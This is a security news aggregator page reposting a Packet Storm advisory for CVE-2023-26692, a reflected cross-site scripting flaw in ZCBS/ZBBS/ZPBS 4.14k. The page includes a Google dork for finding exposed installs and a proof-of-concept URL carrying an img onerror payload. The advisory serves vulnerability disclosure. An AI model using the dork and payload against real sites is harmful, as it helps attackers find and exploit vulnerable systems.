Security
Headlines
HeadlinesLatestCVEs

Headline

ZCBS / ZBBS / ZPBS 4.14k Cross Site Scripting

ZCBS, ZBBS, and ZPBS version 4.14k suffer from a cross site scripting vulnerability.

Packet Storm
Open in Source
#xss#vulnerability#google#ubuntu#auth

Change Mirror Download

# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)# Date: 2023-03-30# CVE: CVE-2023-26692# Exploit Author: Abdulaziz Saad (@b4zb0z)# Vendor Homepage: https://www.zcbs.nl# Version: 4.14k# Tested on: LAMP, Ubuntu# Google Dork: inurl:objecten.pl?ident=3D---[#] Vulnerability :`$_GET['ident']`[#] Exploitation :`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror==3Dalert(%22XSS%22)%3E`

Related news

CVE-2023-26692: GitHub - bigzooooz/CVE-2023-26692: ZCBS/ZBBS/ZPBS v4.14k - Reflected XSS

ZCBS Zijper Collectie Beheer Systeem (ZCBS), Zijper Publication Management System (ZPBS), and Zijper Image Bank Management System (ZBBS) 4.14k is vulnerable to Cross Site Scripting (XSS).

Packet Storm: Latest News

ABB Cylon Aspect 3.07.02 user.properties Default Credentials
Packet Storm